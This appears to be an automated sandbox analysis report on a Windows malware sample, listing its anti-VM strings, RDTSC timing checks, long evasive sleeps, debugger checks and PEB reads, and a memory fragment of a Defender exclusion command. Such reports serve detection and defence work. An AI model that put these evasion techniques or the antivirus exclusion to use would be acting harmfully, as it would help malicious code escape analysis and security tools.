Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 00098765123POIIU.exe PID: 6396, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000032F85E4 second address: 00000000032F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000032F896E second address: 00000000032F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004088A0 rdtsc 3_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6400 Thread sleep time: -103772s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5988 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5776 Thread sleep time: -56000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 103772 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610911018.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.361375592.0000000008540000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004088A0 rdtsc 3_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00409B10 LdrLoadDll, 3_2_00409B10
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA58EC mov eax, dword ptr fs:[00000030h] 3_2_00FA58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE90AF mov eax, dword ptr fs:[00000030h] 3_2_00FE90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9080 mov eax, dword ptr fs:[00000030h] 3_2_00FA9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010269A6 mov eax, dword ptr fs:[00000030h] 3_2_010269A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h] 3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h] 3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010341E8 mov eax, dword ptr fs:[00000030h] 3_2_010341E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h] 3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h] 3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2990 mov eax, dword ptr fs:[00000030h] 3_2_00FD2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071074 mov eax, dword ptr fs:[00000030h] 3_2_01071074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01062073 mov eax, dword ptr fs:[00000030h] 3_2_01062073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA185 mov eax, dword ptr fs:[00000030h] 3_2_00FDA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC182 mov eax, dword ptr fs:[00000030h] 3_2_00FCC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h] 3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h] 3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h] 3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h] 3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC962 mov eax, dword ptr fs:[00000030h] 3_2_00FAC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h] 3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h] 3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h] 3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h] 3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov ecx, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00FD2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106131B mov eax, dword ptr fs:[00000030h] 3_2_0106131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2ACB mov eax, dword ptr fs:[00000030h] 3_2_00FD2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FDFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078B58 mov eax, dword ptr fs:[00000030h] 3_2_01078B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h] 3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h] 3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE927A mov eax, dword ptr fs:[00000030h] 3_2_00FE927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105D380 mov ecx, dword ptr fs:[00000030h] 3_2_0105D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106138A mov eax, dword ptr fs:[00000030h] 3_2_0106138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01075BA5 mov eax, dword ptr fs:[00000030h] 3_2_01075BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h] 3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h] 3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC3A1C mov eax, dword ptr fs:[00000030h] 3_2_00FC3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov ecx, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00FAAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00FAAA16
